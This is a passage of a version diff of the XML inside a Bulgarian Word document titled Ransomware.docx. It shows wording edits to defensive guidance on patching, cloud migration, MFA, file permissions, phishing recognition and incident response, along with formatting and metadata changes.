+      <w:r>
+        <w:t>т</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> проблем с поддържка</w:t>
+      </w:r>
+      <w:r>
+        <w:t>та</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на актуализациите, поради липсва на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">security </w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>maintenance</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>отдел</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Едно решение е да се премине към </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>managed cloud providers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, за да не се налага поддръжка на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exchange server</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> identity server </w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mail gateway.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>loud providers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> следи</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> за уязвимости, </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>процесването</w:t>
+        <w:t>пачва</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> на интернет данни – уеб </w:t>
-      </w:r>
-      <w:r>
-        <w:t>браузери</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> и плъгини. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Малкият и средният бизнес често имат проблем с поддържка</w:t>
-      </w:r>
-      <w:r>
-        <w:t>та</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> на актуализациите, поради липсва на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">security </w:t>
-      </w:r>
-      <w:r>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>maintenance</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>отдел</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve"> системи и има защити против </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DDOS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атаки</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Едно решение е да се премине към </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>managed cloud providers</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, за да не се налага поддръжка на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exchange server</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> identity server </w:t>
-      </w:r>
-      <w:r>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mail gateway.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>C</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>loud providers</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> следи</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> и</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> за уязвимости, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>пачва</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> системи и има защити против </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>DDOS</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> атаки</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="360"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="709"/>
       </w:pPr>
       <w:r>
         <w:t>Всички</w:t>
@@ -10018,27 +9720,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>24</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>24</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -10131,9 +9820,9 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D222F0" wp14:editId="32932ED9">
-            <wp:extent cx="4806950" cy="1856122"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D222F0" wp14:editId="6B7B443B">
+            <wp:extent cx="4536374" cy="1751644"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
             <wp:docPr id="383783366" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -10154,7 +9843,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4829137" cy="1864689"/>
+                      <a:ext cx="4576544" cy="1767155"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -10176,27 +9865,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>25</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>25</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>: Д</w:t>
       </w:r>
@@ -10308,7 +9984,28 @@
         <w:t>VPNs</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> и акаунти, които имат достъп до важни системи. Ескалация към отговорните лица, когато дадена система е установена, че не позволява </w:t>
+        <w:t xml:space="preserve"> и акаунти, които имат достъп до важни системи</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>При установяване на система, която не поддържа MFA, или потребители, които не го използват, е необходимо незабавно да се уведомят отговорните лица.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Съвременните </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10317,30 +10014,6 @@
         <w:t>MFA</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> или </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">има </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">потребители, които не използват </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">MFA. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Съвременните </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>MFA</w:t>
-      </w:r>
-      <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -10491,27 +10164,24 @@
         <w:t xml:space="preserve"> (фиг. 10)</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Същото важи и за</w:t>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:t>Същото важи и за „</w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>umask</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> 000 или подобен, където дава твърде много правомощия за четене, изпълнени и писане върху файловете. А</w:t>
+        <w:t xml:space="preserve"> 000", при който новосъздадените файлове и директории получават максимални права за четене, писане и изпълнение от всички потребители.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> А</w:t>
       </w:r>
       <w:r>
         <w:t>каунти с</w:t>
@@ -10811,27 +10481,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>26</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>26</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -10882,7 +10539,19 @@
         <w:t xml:space="preserve">Потребителят трябва да бъде много внимателен към какви платформи, уеб сайтове, форуми използва своя имейл адрес. </w:t>
       </w:r>
       <w:r>
-        <w:t>Това е и най-лесният начин да стане обект на фишинг атака. Почти всички фишинг имейла носят чувство на тревожност, карат потребителя незабавно да предприеме някакви действия в противен случай, ще се случи Х събитие. Има няколко основни стъпки, по които може да се разпознае дали даден имейл е фишинг или не:</w:t>
+        <w:t>Това е и най-лесният начин да стане обект на фишинг атака. Почти всички фишинг имейла носят чувство на тревожност, карат потребителя незабавно да предприеме някакви действия</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>В</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> противен случай, ще се случи Х събитие. Има няколко основни стъпки, по които може да се разпознае дали даден имейл е фишинг или не:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11114,27 +10783,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>27</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>27</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -11300,7 +10956,13 @@
         <w:t>LinkedIn</w:t>
       </w:r>
       <w:r>
-        <w:t>, където се съдържа информация за това къде живее жертвата, позицията, която заема, какво и къде е учил.</w:t>
+        <w:t xml:space="preserve">, където се съдържа информация за това къде живее </w:t>
+      </w:r>
+      <w:r>
+        <w:t>потърпевшият</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, позицията, която заема, какво и къде е учил.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11346,7 +11008,7 @@
         <w:t>Scareware,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> обикновено ще изискат от потърпевшия да инсталира някой скрипт или да му се предостави достъп до системата.</w:t>
+        <w:t xml:space="preserve"> обикновено ще изискат от потърпевшия да инсталира скрипт или да му се предостави достъп до системата.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -11448,7 +11110,7 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Веднага да се определят засегнатите системи  и да се изолират. Ако множество системи и/или </w:t>
+        <w:t xml:space="preserve">Веднага да се определят засегнатите системи и да се изолират. Ако множество системи и/или </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11538,7 +11200,19 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>След първоначалната атака киберпрестъпниците могат да имат достъп до вътрешните комуникации и да реагират на всяко едно предприето действие. За това комуникацията трябва да се извършва извънмрежово (</w:t>
+        <w:t>След първоначалната атака</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> киберпрестъпниците </w:t>
+      </w:r>
+      <w:r>
+        <w:t>имат</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> достъп до вътрешните комуникации и да реагират на всяко едно предприето действие. За това комуникацията трябва да се извършва извънмрежово (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15290,6 +14964,15 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x010100EA7F95447AE5CD4A96E24D58484FA3D2" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="152a1f3b266b5df558eb501d08fa54b7">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xmlns:ns4="c5dcd230-26b3-4f1e-a7d8-2c2a40be033b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="ebbaa98d623378dfae11ad7cf338cc80" ns3:_="" ns4:_="">
     <xsd:import namespace="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
@@ -15484,24 +15167,7 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
 <file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
-<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
   <b:Source>
     <b:Tag>Sto</b:Tag>
@@ -15682,7 +15348,23 @@
 </b:Sources>
 </file>
 
+<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EC25E0E9-ED1E-4DED-B1D8-B99F35F6AB52}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -15701,15 +15383,15 @@
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{451CF4A7-B298-49AF-BD69-AB8853A0DC1A}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
@@ -15719,14 +15401,6 @@
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{451CF4A7-B298-49AF-BD69-AB8853A0DC1A}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
 <file path=docMetadata/LabelInfo.xml><?xml version="1.0" encoding="utf-8"?>
 <clbl:labelList xmlns:clbl="http://schemas.microsoft.com/office/2020/mipLabelMetadata">
   <clbl:label id="{0cf7ac0a-4681-4823-ab0b-04ef02c5f873}" enabled="1" method="Standard" siteId="{42f7676c-f455-423c-82f6-dc2d99791af7}" contentBits="0" removed="0"/>

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -530,7 +530,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc223896477" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154926" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -558,7 +558,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896477 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154926 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -601,7 +601,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896478" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154927" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -636,7 +636,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896478 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154927 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -679,7 +679,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896479" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154928" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -714,7 +714,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896479 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154928 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -758,7 +758,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896480" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154929" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -808,7 +808,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896480 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154929 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -852,7 +852,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896481" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154930" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -917,7 +917,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896481 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154930 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -961,7 +961,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896482" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154931" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1005,7 +1005,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896482 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154931 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1049,7 +1049,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896483" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154932" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1115,7 +1115,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896483 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154932 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1159,7 +1159,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896484" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154933" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1217,7 +1217,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896484 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154933 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1260,7 +1260,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896485" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154934" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1295,7 +1295,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896485 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154934 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1338,7 +1338,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896486" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154935" w:history="1">
             <w:r>
               <w:rPr>
